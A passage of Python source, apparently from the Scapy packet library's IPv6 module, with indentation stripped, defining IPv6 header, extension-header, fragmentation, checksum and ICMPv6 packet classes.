tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
Functions operate by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every options has
an alignment requirement ususally expressed xn+y, meaning
the Option Type must appear at an integer multiple of x octest
from the start of the header, plus y octet.
That function is provided the current position from the
start of the header and returns required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for p in l:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = 0
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremeted during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
